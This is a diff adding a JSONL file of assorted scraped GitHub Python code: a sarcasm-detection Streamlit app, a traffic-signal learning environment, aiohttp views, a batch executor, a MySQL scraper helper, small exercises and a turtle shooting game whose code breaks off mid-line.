diff --git "a/5319.jsonl" "b/5319.jsonl" new file mode 100644--- /dev/null +++ "b/5319.jsonl" @@ -0,0 +1,518 @@ +{"seq_id":"35607222031","text":"import re\r\nimport os\r\nimport pickle\r\nimport numpy as np\r\nimport streamlit as st\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\r\n\r\n# Function to pre-process text\r\ndef preprocess(phrase): \r\n \r\n phrase = phrase.lower() \r\n phrase = re.sub(r\"won't\", \"will not\", phrase)\r\n phrase = re.sub(r\"can\\'t\", \"can not\", phrase)\r\n phrase = re.sub(r\"n\\'t\", \" not\", phrase)\r\n phrase = re.sub(r\"\\'re\", \" are\", phrase)\r\n phrase = re.sub(r\"\\'s\", \" is\", phrase)\r\n phrase = re.sub(r\"\\'d\", \" would\", phrase)\r\n phrase = re.sub(r\"\\'ll\", \" will\", phrase)\r\n phrase = re.sub(r\"\\'t\", \" not\", phrase)\r\n phrase = re.sub(r\"\\'ve\", \" have\", phrase)\r\n phrase = re.sub(r\"\\'m\", \" am\", phrase)\r\n phrase = re.sub('[^\\w\\s]','', phrase).strip()\r\n\r\n return phrase\r\n\r\n# loading tokenizer object\r\nwith open('tokenizer.pkl', 'rb') as f:\r\n t = pickle.load(f)\r\n \r\n# loading best model\r\nmodel = load_model('bi_lstm_model1.hdf5')\r\n\r\ndef predict(s):\r\n '''This function takes a comment(string) as input and \r\n returns whether the comment is sarcastic or not as output'''\r\n \r\n # Convert input string to list\r\n inp_str = [preprocess(s)]\r\n\r\n # Tokenize input string\r\n encoded_str = t.texts_to_sequences(inp_str)\r\n\r\n # Padding input sequence to have length of 30\r\n padded_str = pad_sequences(encoded_str, maxlen=30, dtype='int32', \r\n padding='post', truncating='post', value=0.0)\r\n \r\n # prediction on padded input sequence\r\n pred = model.predict(padded_str).flatten()[0]\r\n pred_int = np.where(pred >= 0.5, 1, 0).flatten()[0]\r\n\r\n # Output string\r\n if pred_int == 1:\r\n prob = round(pred * 100, 2)\r\n op_str = 'The above comment is sarcastic with {} % confidence'.format(prob) \r\n else:\r\n prob = round((1-pred) * 100, 2)\r\n op_str = 'The above comment is not sarcastic with {} % confidence'.format(prob)\r\n \r\n return op_str\r\n\r\ndef main():\r\n st.set_page_config(page_title=\"SARCASM DETECTION\", \r\n page_icon=\":robot_face:\",\r\n layout=\"wide\",\r\n )\r\n st.markdown(\"

Sarcasm Detection with NLP 🤖

\", unsafe_allow_html=True)\r\n st.text('')\r\n st.markdown(f'

Detect Sarcasm

', unsafe_allow_html=True)\r\n st.text('')\r\n input_text = st.text_area(\"Enter text and click on Predict to know if it's sarcastic\", max_chars=500, height=150)\r\n if st.button(\"Predict\"):\r\n output = predict(input_text)\r\n st.write(output)\r\n \r\nif __name__=='__main__':\r\n main()\r\n\r\n ","repo_name":"sumeetshahu/Sarcasm_Detection","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32889681717","text":"\nfrom Car import Car\nfrom Road import Road\nimport numpy as np\n\n\n\nclass Intersection:\n\n\tdef __init__(self, length, prob, keepalive, wait_weight):\n\t\tself.NSRoad = Road(length,prob)\n\t\tself.EWRoad = Road(length,prob)\n\t\tself.keepalive = keepalive\n\t\tself.total_reward = 0\n\t\tself.length = length\n\t\tself.prob = prob\n\t\tself.end = False\n\t\tself.wait_weight = wait_weight\n\n\tdef getState(self):\n\t\ttemp = np.array([np.array(self.NSRoad.binaryRepresentation()), np.array(self.EWRoad.binaryRepresentation())])\n\t\treturn temp\n\n\tdef newInstance(self):\n\t\tself.NSRoad = Road(self.length, self.prob)\n\t\tself.EWRoad = Road(self.length, self.prob)\n\t\tself.end = False\n\t\tself.total_reward = 0\n\n\tdef getReward(self):\n\t\treturn self.total_reward\n\n\tdef gameEnd(self):\n\t\treturn self.end\n\n\tdef step(self,NS_action, EW_action):\n\t\tNSoutput = self.NSRoad.step(NS_action)\n\t\tEWoutput = self.EWRoad.step(EW_action)\n\t\tstep_reward = 0\n\n\t\tif (NSoutput[1][0] == 1) and (EWoutput[1][0] == 1):\n\t\t\tself.NSRoad.crash()\n\t\t\tself.EWRoad.crash()\n\t\t\tself.total_reward -= 100\n\t\t\tself.end = True\n\t\t\treturn -100\n\n\t\tif (NSoutput[0][0] == 1):\n\t\t\tstep_reward += 15\n\n\t\tif (EWoutput[0][0] == 1):\n\t\t\tstep_reward += 15\n\n\t\twait_penalty = self.wait_weight * (self.NSRoad.totalWait() + self.EWRoad.totalWait())\n\n\t\tstep_reward += (self.keepalive - wait_penalty)\n\t\tself.total_reward += step_reward\n\t\treturn step_reward\n\n","repo_name":"ataozhou/Traffic_Controller","sub_path":"Intersection.py","file_name":"Intersection.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6143955907","text":"from aiohttp import web\nfrom repository import get_documents, get_document\nfrom service import create_document_view_model\n\nasync def index(request):\n return web.Response(text='Hello Aiohttp!')\n\n\nasync def documents(request):\n pagesize = int(request.app['config']['api']['page_size'])\n\n dataset = request.match_info['dataset']\n page = int(request.query.get('page', 0))\n\n start, end = get_bounds(page, pagesize)\n documents = await get_documents(request, dataset, start, end)\n\n documents = [\n {\n 'id': document['id'],\n 'headline': document['headline'],\n 'text': document['lead'] if document['lead'] else document['text'],\n }\n for document in documents\n ]\n\n return web.json_response(documents)\n\n\nasync def document(request):\n dataset = request.match_info['dataset']\n document_id = int(request.match_info['id'])\n document = await get_document(request, dataset, document_id)\n view_model = create_document_view_model(document)\n return web.json_response(view_model)\n\ndef get_bounds(page, pagesize):\n start = page*pagesize\n end = start + pagesize\n\n return start, end","repo_name":"Nadja-K/keyphrase-extraction---Group-Project","sub_path":"server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1913247645","text":"#!/usr/bin/env python3\nfrom collections import OrderedDict\n\n# primitive interaction --> valence\nprimitive_interactions = OrderedDict([\n (('e1', 'r1'), -1),\n (('e1', 'r2'), +1),\n (('e2', 'r1'), -1),\n (('e2', 'r2'), +1),\n ])\nprimitive_experiments = ['e1', 'e2']\n\nclass CompositeInteraction(tuple):\n \"an interaction of the form (preInteraction, postInteraction)\"\n pass # it's just a tuple\n\ndef getValence(interaction):\n if isinstance(interaction, CompositeInteraction):\n pre, post = interaction\n return getValence(pre) + getValence(post)\n else:\n experiment, result = interaction\n if interaction not in primitive_interactions:\n return getValence(result)\n else:\n return primitive_interactions[interaction]\n\nlearned = OrderedDict() # compositeInteraction --> weight\ndef learn(pre, post):\n ci = CompositeInteraction((pre, post))\n learned[ci] = learned.get(ci, 0) + 1\n print('learned', pretty(ci), 'valence', getValence(ci), 'weight', learned[ci])\n\ndef anticipate(context):\n anticipations = OrderedDict() # experiment --> proclivity\n for e in primitive_experiments:\n anticipations[e] = 0\n\n for (pre, post), weight in learned.items():\n if pre in context:\n proclivity = weight * getValence(post)\n if isinstance(post, CompositeInteraction):\n experiment = post # propose to re-enact the whole thing\n else:\n experiment = post[0] # it's an (experiment, result) interaction\n anticipations[experiment] = anticipations.get(experiment, 0) + proclivity\n return anticipations\n\ndef selectExperiment(anticipations):\n l = list(anticipations.items())\n l.sort(key=lambda x: -x[1]) # sort by decreasing proclivity\n for experiment, proclivity in l:\n print('propose', pretty(experiment), 'proclivity', proclivity)\n return l[0][0] # pick experiment with highest proclivity\n\ndef enact(interaction):\n if isinstance(interaction, CompositeInteraction):\n pre, post = interaction\n enacted = enact(pre)\n if enacted != pre:\n return enacted\n else:\n return CompositeInteraction((pre, enact(post)))\n else:\n experiment, result = interaction\n if experiment in primitive_experiments:\n result = environmentGetResult(experiment)\n else:\n result = enact(experiment)\n return (experiment, result)\n\n# this is Environment040\nenvHist = [None, None]\ndef environmentGetResult(experiment):\n result = 'r1'\n if envHist[-2] != experiment and envHist[-1] == experiment:\n result = 'r2'\n envHist.append(experiment)\n return result\n\ndef run():\n hist = [None, None] # history of enacted interactions\n for cycle in range(30):\n context = [] # interactions that are considered \"previous\"\n if hist[-1]:\n context.append(hist[-1])\n if isinstance(hist[-1], CompositeInteraction):\n pre, post = hist[-1]\n context.append(post)\n if hist[-1] and hist[-2]:\n context.append(CompositeInteraction((hist[-2], hist[-1])))\n print('context', [pretty(i) for i in context])\n\n anticipations = anticipate(context)\n experiment = selectExperiment(anticipations)\n print('attempt', pretty(experiment))\n if isinstance(experiment, CompositeInteraction):\n intendedInteraction = experiment\n else:\n intendedInteraction = (experiment, None)\n enacted = enact(intendedInteraction)\n print('enacted', pretty(enacted), 'valence', getValence(enacted))\n\n if enacted != intendedInteraction and isinstance(experiment, CompositeInteraction):\n # execution of composite interaction failed\n enacted = (experiment, enacted) # 'enacted' is the result\n print('enacted really', pretty(enacted))\n\n if hist[-1]:\n learn(hist[-1], enacted)\n if hist[-1] and hist[-2]:\n learn(hist[-2], CompositeInteraction((hist[-1], enacted)))\n learn(CompositeInteraction((hist[-2], hist[-1])), enacted)\n hist.append(enacted)\n\n if getValence(enacted) >= 0:\n mood = 'pleased'\n else:\n mood = 'pained'\n\n print('===', cycle, pretty(enacted), mood)\n\ndef pretty(thing):\n if isinstance(thing, str):\n return thing\n a, b = thing\n if isinstance(thing, CompositeInteraction):\n return '<' + pretty(a) + pretty(b) + '>'\n if thing in primitive_interactions:\n return pretty(a) + pretty(b)\n return ('(' + pretty(a) + '|' + pretty(b) + ')').upper()\n\nrun()\n","repo_name":"martinxyz/ideal-mooc","sub_path":"Existence040.py","file_name":"Existence040.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"22925093200","text":"from Advanced.Finals_Advanced.VKinder_methods import VKinder\r\nfrom Advanced.Finals_Advanced.mongo_handler import Mongo\r\nfrom pprint import pprint\r\nimport json\r\nfrom Advanced.Finals_Advanced.constants import *\r\nfrom copy import deepcopy\r\n\r\n\r\nclass VKinder_search:\r\n\r\n def __init__(self):\r\n self.instance = VKinder()\r\n self.user = self.instance.get_user()\r\n self.base = Mongo('VKinder')\r\n self.collection = self.base.new_collection(self.user)\r\n self.page = 0\r\n self.full_list = self.search_matches()\r\n\r\n def search_matches(self):\r\n '''\r\n Ищет варианты совпадений\r\n :return: dict\r\n '''\r\n results = self.instance.search()\r\n final_res = self.instance.save_search_results(results)\r\n return final_res\r\n\r\n def search_first_page(self):\r\n '''\r\n Возвращает топ 10 пользователей при первом поиске\r\n :return:\r\n '''\r\n clear_matches_to_base = self.instance.show_10(self.full_list, page=self.page)\r\n while self.check_matches_in_base(clear_matches_to_base) == True:\r\n self.page += 10\r\n clear_matches_to_base = self.instance.show_10(self.full_list, page=self.page)\r\n print(clear_matches_to_base)\r\n copy_to_base = deepcopy(clear_matches_to_base)\r\n self.show_result_and_write_to_base(copy_to_base)\r\n return clear_matches_to_base\r\n\r\n def search_next_page(self):\r\n '''\r\n Возвращает ТОП 10 при последующих поисках\r\n :return:\r\n '''\r\n if self.page < len(self.full_list) // 10:\r\n self.page += 10\r\n else:\r\n print('Вы достигли конца списка')\r\n clear_matches_to_base = self.instance.show_10(self.full_list, page=self.page)\r\n copy_to_base = deepcopy(clear_matches_to_base)\r\n self.show_result_and_write_to_base(copy_to_base)\r\n return clear_matches_to_base\r\n\r\n # def send_list_to_base(self, list_to_base):\r\n # self.show_result_and_write_to_base(copy_to_base)\r\n\r\n def show_result_and_write_to_base(self, result):\r\n '''\r\n Выводит результат, отправляет копию в базу\r\n :param result:\r\n :return:\r\n '''\r\n print(SEPARATOR)\r\n print('Результат поиска')\r\n pprint(result)\r\n if not self.check_matches_in_base(result):\r\n self.base.add_to_base(result, self.collection)\r\n return None\r\n\r\n def save_result_to_file(self, info_to_save):\r\n '''\r\n Получает на вход список словарей, кодирует в json, пишет в файл\r\n :param info_to_save: list of dicts\r\n :return:\r\n '''\r\n filename = f'Search_{self.user}_page_{self.page // 10}.json'\r\n with open(filename, 'w', encoding='utf-8') as file:\r\n json.dump(info_to_save, file)\r\n print(f'Файл {filename} успешно сохранен')\r\n return True\r\n\r\n def check_matches_in_base(self, search_list_of_dicts):\r\n to_check = search_list_of_dicts\r\n in_base = self.base.find_by_id_in_base(str(self.user))\r\n to_check_set = set()\r\n for i in to_check:\r\n to_check_set.update(i.keys())\r\n id_check = to_check_set - in_base\r\n if len(id_check) > 0:\r\n return False\r\n else:\r\n return True\r\n\r\n def start(self):\r\n '''\r\n UI ;)\r\n :return:\r\n '''\r\n print('Идет поиск')\r\n quit_program = False\r\n result = self.search_first_page()\r\n while not quit_program:\r\n user_input = input(MENU_TEXT_MAIN)\r\n if user_input in ACCEPTABLE_ANSWERS:\r\n if user_input == '1':\r\n self.save_result_to_file(result)\r\n if user_input == '2':\r\n result = self.search_next_page()\r\n if user_input == 'quit':\r\n break\r\n else:\r\n print('НЕВЕРНЫЙ ВВОД')\r\n print('Программа завершена')","repo_name":"evgeniyism/hw_dev","sub_path":"Finals/VKinder_manager.py","file_name":"VKinder_manager.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21208085116","text":"import queue\nfrom concurrent.futures import Future\nfrom queue import Queue\nfrom threading import Thread\nfrom typing import Any, Callable, Iterable, List, NamedTuple, Optional\n\nfrom vcap import deprecated\n\n\nclass _Request(NamedTuple):\n \"\"\"Used by BatchExecutor to keep track of requests and their respective\n future objects.\n \"\"\"\n\n future: Future\n \"\"\"The Future object for the BatchExecutor to return the output\"\"\"\n\n input_data: Any\n \"\"\"A unit of input data expected by the batch_fn.\"\"\"\n\n\nclass BatchExecutor:\n \"\"\"Feeds jobs into batch_fn in batches, returns results through Futures.\n\n This class simplifies centralizing work from a multitude of sources and\n running that work in a batched predict function, then returning that\n work to the respective Futures.\n \"\"\"\n\n def __init__(self,\n batch_fn: Callable[[List[Any]], Iterable[Any]],\n max_batch_size=40,\n num_workers: int = 1):\n \"\"\"Initialize a new BatchExecutor\n\n :param batch_fn: A function that takes in a list of inputs and iterates\n the outputs in the same order as the inputs.\n :param max_batch_size: The maximum length of list to feed to batch_fn\n :param num_workers: How many workers should be calling batch_fn\n \"\"\"\n self.batch_fn = batch_fn\n self.max_batch_size = max_batch_size\n self._request_queue: Queue[_Request] = Queue()\n self.workers = [Thread(target=self._worker,\n daemon=True,\n name=\"BatchExecutorThread\")\n for _ in range(num_workers)]\n\n # The number of images currently in the work queue or being processed\n self._num_imgs_being_processed: int = 0\n\n self._running: bool = True\n\n for worker in self.workers:\n worker.start()\n\n @property\n def total_imgs_in_pipeline(self) -> int:\n return self._request_queue.qsize() + self._num_imgs_being_processed\n\n def submit(self, input_data: Any, future: Future = None) -> Future:\n \"\"\"Submits a job and returns a Future that will be fulfilled later.\"\"\"\n future = future or Future()\n\n self._request_queue.put(_Request(\n future=future,\n input_data=input_data))\n return future\n\n def _on_requests_ready(self, batch: List[_Request]) -> None:\n \"\"\"Push inputs through the given prediction backend\n\n :param batch: A list of requests to work on\n \"\"\"\n # Extract the futures from the requests\n inputs: List[Any] = [req.input_data for req in batch]\n futures: List[Future] = [req.future for req in batch]\n\n # Route the results to each request\n try:\n for prediction in self.batch_fn(inputs):\n # Popping the futures ensures that if an error occurs, only\n # the futures that haven't had a result set will have\n # set_exception called\n futures.pop(0).set_result(prediction)\n except BaseException as exc:\n # Catch exceptions and pass them to the futures, similar to the\n # ThreadPoolExecutor implementation:\n # https://github.com/python/cpython/blob/91e93794/Lib/concurrent/futures/thread.py#L51\n for future in futures:\n future.set_exception(exc)\n\n def _worker(self):\n self._running = True\n\n while self._running:\n # Get a new batch\n batch = self._get_next_batch()\n\n # If no batch was able to be retrieved, restart the loop\n if batch is None:\n continue\n\n # Check to make sure the thread isn't trying to end\n if not self._running:\n break\n\n self._num_imgs_being_processed += len(batch)\n self._on_requests_ready(batch)\n self._num_imgs_being_processed -= len(batch)\n\n self._running = False\n\n def _get_next_batch(self) -> Optional[List[_Request]]:\n \"\"\"A helper function to help make the main thread loop more readable\n :returns: A non-empty list of collected items, or None if the worker is\n no longer running (i.e. self._continue == False)\n \"\"\"\n batch: List[_Request] = []\n while len(batch) < self.max_batch_size:\n # Check if there's a new request\n try:\n # Try to get a new request. Have a timeout to check if closing\n new_request = self._request_queue.get(timeout=.1)\n except queue.Empty:\n # If the thread is being requested to close, exit early\n if not self._running:\n return None\n\n # Wait for requests again\n continue\n\n batch.append(new_request)\n\n # If the request queue is now empty, let worker run everything in\n # the batch\n if self._request_queue.empty():\n break\n\n return batch\n\n def close(self) -> None:\n \"\"\"Stop the BatchExecutor gracefully.\"\"\"\n self._running = False\n for worker in self.workers:\n worker.join()\n","repo_name":"opencv/open_vision_capsules","sub_path":"vcap/vcap/batch_executor.py","file_name":"batch_executor.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"52"} +{"seq_id":"23363046632","text":"import emoji\r\n\r\nsoma = 0\r\ncont = 0\r\nfor c in range (1, 501, 2):\r\n if c % 3 == 0:\r\n cont += 1\r\n soma += c # += é ele recebe ele + ...\r\nprint('A Soma de todos os {} valores solicitados é de {}' .format(cont, soma))\r\nprint(emoji.emojize(':fox:'))\r\n","repo_name":"MatsonMatson/Python","sub_path":"ex048.py","file_name":"ex048.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72879404004","text":"number = int(input())\nnumber = number >> 1\nnum_one_pos = number & 1\nprint(num_one_pos)\n\n# Looking for the bit in position one.\n# We move the bit to the right once with the >> operator\n# Then we use a mask 1 and the & operator to find out what bit it is there\n# 0 & 0 == 0, 0 & 1 == 0, 1 & 1 == 1\n\n","repo_name":"Dan-Mihaylov/Software-Uni-Courses","sub_path":"Fundamentals/bitwise_operations_lab/02_bit_at_position_one.py","file_name":"02_bit_at_position_one.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"716824335","text":"\nimport pymysql,timeit\nclass MySqlUtils(object):\n errorModel = \"{count:%s,class:%s,method:%s,errorInfo:%s}\"\n errorCount=0\n vcar_host=\"10.1.11.129\"\n var_password='12345'\n #获取数据库链接\n @classmethod\n def getConnection(cls):\n conn = pymysql.connect(host='localhost', user='root', passwd='root', db='vcar_vcyber_com', port=3306, charset='utf8')\n return conn\n\n @classmethod\n def queryBrandId(cls):\n #self.log(\"start query --------------------------------\")\n queryList=list()\n try:\n conn = cls.getConnection()\n cur = conn.cursor()\n sql=\"\"\"\n SELECT `vcar_pinpai`.`pinpaiID`\n FROM `vcar_vcyber_com`.`vcar_pinpai`;\n \"\"\"\n cur.execute(sql)\n res=cur.fetchall()\n #for item in res:\n #print(item)\n #self.log(item)\n #返回的是列表,列表元素类型是元组[(),(),,]\n return res\n\n except Exception as e:\n pass\n #print(e)\n #self.log(e)\n #self.log(\"查询失败\")\n finally:\n cur.close()\n conn.close()\n #self.log(\"end query ----------------------------------\")\n\n\n #查询车系信息,返回元组(brandId,seriesId,seriesLink)\n @classmethod\n def querySeriesLink(cls):\n sql=\"\"\"\n SELECT \n `vcar_chexi`.`pinpaiID`,\n `vcar_chexi`.`chexiID`,\n `vcar_chexi`.`url`\n FROM `vcar_vcyber_com`.`vcar_chexi`;\n \"\"\"\n try:\n #获取数据连接\n conn=cls.getConnection()\n #获取查询游标\n cursor=conn.cursor()\n #执行查询\n cursor.execute(sql)\n #获取结果\n res=cursor.fetchall()\n #for item in res:\n # print(item)\n return res\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n # 查询车型链接信息\n @classmethod\n def querySpecLink(self):\n sql = \"\"\"\n SELECT `vcar_chexing`.`chexingID`,\n `vcar_chexing`.`pinpaiID`,\n `vcar_chexing`.`chexiID`,\n `vcar_chexing`.`name`,\n `vcar_chexing`.`url`\n FROM `vcar_vcyber_com`.`vcar_chexing`;\n \"\"\"\n try:\n conn = self.getConnection()\n cursor = conn.cursor()\n cursor.execute(sql)\n res = cursor.fetchall()\n # for item in res:\n # print(item)\n return res\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n\n #返回一个以属性id为key,属性名为value的字典\n @classmethod\n def queryShuxing(cls):\n sql=\"\"\"\n SELECT `vcar_shuxing`.`shuxingID`,\n `vcar_shuxing`.`name`\n FROM `vcar_vcyber_com`.`vcar_shuxing`;\n \"\"\"\n try:\n if id:\n conn=cls.getConnection()\n cursor=conn.cursor()\n cursor.execute(sql)\n res=cursor.fetchall()\n #转为Dic数据类型\n shuxingDic=dict()\n for item in res:\n shuxingDic.setdefault(item[1],item[0])\n return shuxingDic\n else:\n return None\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n\n # 查询属性类型表返回以属性名作为key,属性id为value的字典\n @classmethod\n def queryShuxingType(cls):\n sql=\"\"\"\n SELECT \n `vcar_shuxingtype`.`name`,\n `vcar_shuxingtype`.`shuxingTypeID`\n FROM `vcar_vcyber_com`.`vcar_shuxingtype`;\n \"\"\"\n try:\n conn=cls.getConnection()\n cursor=conn.cursor()\n cursor.execute(sql)\n res=cursor.fetchall()\n #转Dict数据类型\n typeDict=dict()\n for item in res:\n typeDict.setdefault(item[0],item[1])\n return typeDict\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n # 查询属性type下的属性集合{shuxingType:{shuxingName:shuxingValue,,,},,,}\n @classmethod\n def queryTypeShuxingDic(cls):\n typeDic=cls.queryShuxingType()\n sql=\"\"\"\n SELECT `vcar_shuxing`.`shuxingID`,\n `vcar_shuxing`.`name`\n FROM `vcar_vcyber_com`.`vcar_shuxing` \n where shuxingTypeID=%s \n \"\"\"\n typeShuxingDic=dict()\n try:\n conn = cls.getConnection()\n cursor = conn.cursor()\n for key in typeDic.keys():\n typeId=typeDic.get(key)\n cursor.execute(sql,typeId)\n res=cursor.fetchall()\n shuxingDic=dict()\n for item in res:\n shuxingDic.setdefault(item[1],item[0])\n typeShuxingDic.setdefault(key,shuxingDic)\n return typeShuxingDic\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n # 插入到属性表\n @classmethod\n def insertIntoShuxing(cls,params):\n sql=\"\"\"\n INSERT INTO `vcar_vcyber_com`.`vcar_shuxing`\n (`shuxingID`,\n `shuxingTypeID`,\n `name`)\n VALUES\n (%s,\n %s,\n %s);\n \"\"\"\n try:\n conn=cls.getConnection()\n cursor=conn.cursor()\n res=cursor.executemany(sql, params)\n conn.commit()\n return res\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n\n @classmethod\n def queryChexingShuxingById(cls,id):\n startTime=timeit.default_timer()\n sql=\"\"\"\n SELECT \n `vcar_chexingshuxing`.`chexingID`\n FROM `vcar_vcyber_com`.`vcar_chexingshuxing`\n where chexingID=%s;\n \"\"\"\n try:\n conn=cls.getConnection()\n cursor=conn.cursor()\n cursor.execute(sql,id)\n res=cursor.fetchone()\n endTime=timeit.default_timer()\n print(\"queryIsInsertCastTime------------------->: %s\" % str(endTime-startTime))\n if res:\n return True\n else:\n return False\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n @classmethod\n def insertOneShuxing(cls,params):\n sql=\"\"\"\n INSERT INTO `vcar_vcyber_com`.`vcar_shuxing`\n (`shuxingID`,\n `shuxingTypeID`,\n `name`)\n VALUES\n (%s,\n %s,\n %s);\n \"\"\"\n try:\n conn=cls.getConnection()\n cursor=conn.cursor()\n i=cursor.execute(sql, params)\n conn.commit()\n return i\n except Exception as e:\n pass\n finally:\n conn.close()\n cursor.close()\n\n #向车型属性表中插入数据\n @classmethod\n def insertChexingShuxing(cls, paramsList):\n startTime=timeit.default_timer()\n sql=\"\"\"\n INSERT INTO \n `vcar_vcyber_com`.`vcar_chexingshuxing`\n (`chexingshuxingID`,\n `chexingID`,\n `shuxingID`,\n `shuxingName`,\n `shuxingValue`)\n VALUES\n (%s,\n %s,\n %s,\n %s,\n %s);\n \"\"\"\n try:\n conn = cls.getConnection()\n cursor = conn.cursor()\n #print(paramsList)\n res =cursor.executemany(sql,paramsList)\n conn.commit()\n endTime = timeit.default_timer()\n print(\"insertChexingShuxingCastTime------------------------>:%s\" % str(endTime-startTime))\n except Exception as e:\n print(e)\n cls.errorCount+=1\n filename = \"/Users/guohan/DeskTop/mySqlError.txt\"\n error=cls.errorModel % (cls.errorCount,\"MySqlUtils\",\"insertChexingShuxing\",str(e))\n with open(filename, 'a') as f: # 'a'表示append,即在原来文件内容后继续写数据(不清楚原有数据)\n f.write(error)\n f.flush()\n f.close()\n finally:\n conn.close()\n cursor.close()\n\n\n # 查询已爬取过配置的车型id\n @classmethod\n def queryExistChexingId(cls):\n sql=\"\"\" \n SELECT distinct(t.chexingID) \n FROM vcar_vcyber_com.vcar_chexingshuxing t \n \"\"\"\n try:\n # 获取数据连接\n conn = cls.getConnection()\n # 获取查询游标\n cursor = conn.cursor()\n # 执行\n # print(itemList)\n cursor.execute(sql)\n # 提交\n conn.commit()\n res=cursor.fetchall()\n return res\n except Exception as e:\n print(e)\n finally:\n cursor.close()\n conn.close()\n\n # 将上一个查询车型id方法返回值转换为list\n @classmethod\n def parseChexingIdTupeListToSet(cls,res):\n chexingIdSet=set()\n for item in res:\n chexingIdSet.add(item[0])\n print(chexingIdSet)\n \n \n \n#\n# my = MySqlUtils()\n# res=my.queryExistChexingId()\n# my.parseChexingIdTupeListToSet(res)\n# name=\"基本参数\"\n# typeDict=my.queryShuxingType()\n# keys=typeDict.keys()\n# # for key in keys:\n# # print(key,typeDict[key])\n# shuxingDict=my.queryShuxing()\n# shuxingKeys=shuxingDict.keys()\n# for key in shuxingKeys:\n# print(key,shuxingDict[key])\n# typeDic=MySqlUtils.queryShuxingType()\n# print(typeDic)\n# print(MySqlUtils.queryTypeShuxingDic())\n","repo_name":"guohan168/spider","sub_path":"vcarConfigSpider/mySqlUtils.py","file_name":"mySqlUtils.py","file_ext":"py","file_size_in_byte":10388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33371665155","text":"import turtle\nimport math\nimport time\n\n#Boundary\nBoundary = turtle.Turtle()\nBoundary.penup()\nBoundary.pensize(20)\nBoundary.speed(0)\nBoundary.goto(-450, -300)\nBoundary.color(\"white\")\nBoundary.pendown()\nBoundary.forward(900)\nBoundary.left(90)\nBoundary.forward(600)\nBoundary.left(90)\nBoundary.forward(900)\nBoundary.left(90)\nBoundary.forward(600)\n\n\n#Screen size and color\nwindow = turtle.Screen()\nwindow.bgcolor(\"black\")\nwindow.setup(width=900, height=500)\nwindow.tracer(0)\n\n#Score\nscore_1 = -1\nscore_2 = -1\n\n\n#The first player\nplayer_1 = turtle.Turtle()\nplayer_1.speed(0)\nplayer_1.shape(\"square\")\nplayer_1.color(\"yellow\")\nplayer_1.shapesize(stretch_wid=3, stretch_len=1)\nplayer_1.penup()\nplayer_1.goto(-350, 0)\n\n\n#The second player\nplayer_2 = turtle.Turtle()\nplayer_2.speed(0)\nplayer_2.shape(\"square\")\nplayer_2.color(\"green\")\nplayer_2.shapesize(stretch_wid=3, stretch_len=1)\nplayer_2.penup()\nplayer_2.goto(350, 0)\n\n#Bullet player 1\nbullet = turtle.Turtle()\nbullet.color(\"yellow\")\nbullet.shape(\"circle\")\nbullet.penup()\nbullet.speed(0)\nbullet.setheading(90)\nbullet.shapesize(0.5, 0.5)\nbullet.hideturtle()\n\nbulletspeed = 40\n\n\n#ready - ready to fire\n#fire - bullet is firing\nbulletcondition = \"ready to shoot\"\n\n#Bullet for player 2\nbullet_2 = turtle.Turtle()\nbullet_2.color(\"green\")\nbullet_2.shape(\"circle\")\nbullet_2.penup()\nbullet_2.speed(0)\nbullet_2.setheading(90)\nbullet_2.shapesize(0.5, 0.5)\nbullet_2.hideturtle()\n\nbullet_2speed = -40\nbullet_2condition = \"ready to shoot\"\n\n#Scoring system\nscore = turtle.Turtle()\nscore.speed(0)\nscore.color(\"white\")\nscore.penup()\nscore.hideturtle()\nscore.goto(0, 250)\nscore.write(\"Player 1: 0 Player 2: 0\", align = \"center\", font = (\"Impact\", 28, \"normal\"))\n\n#Movement of the first player\ndef player_1_up():\n y = player_1.ycor()\n y += 50\n player_1.sety(y)\n\ndef player_1_down():\n y = player_1.ycor()\n y -= 50\n player_1.sety(y)\n\n#Movement of the second player\ndef player_2_up():\n y = player_2.ycor()\n y += 50\n player_2.sety(y)\n\ndef player_2_down():\n y = player_2.ycor()\n y -= 50\n player_2.sety(y)\n\n#Defining firing the bullet\ndef shoot_bullet():\n #Declare bullet as a global if it needs to change\n global bulletcondition\n if bulletcondition == \"ready to shoot\":\n bulletcondition = \"shoot\"\n #Move the bullet to the right\n x = player_1.xcor() + 10\n y = player_1.ycor()\n bullet.setposition(x, y)\n bullet.showturtle()\n\ndef shoot_bullet_2():\n global bullet_2condition\n if bullet_2condition == \"ready to shoot\":\n bullet_2condition = \"shoot\"\n #Move bullet 2\n x = player_2.xcor() \n y = player_2.ycor()\n bullet_2.setposition(x-10, y)\n bullet_2.showturtle()\n\ndef bulletCollision(p1, p2):\n distance = math.sqrt(math.pow(p2.xcor()-p1.xcor(),2)) + 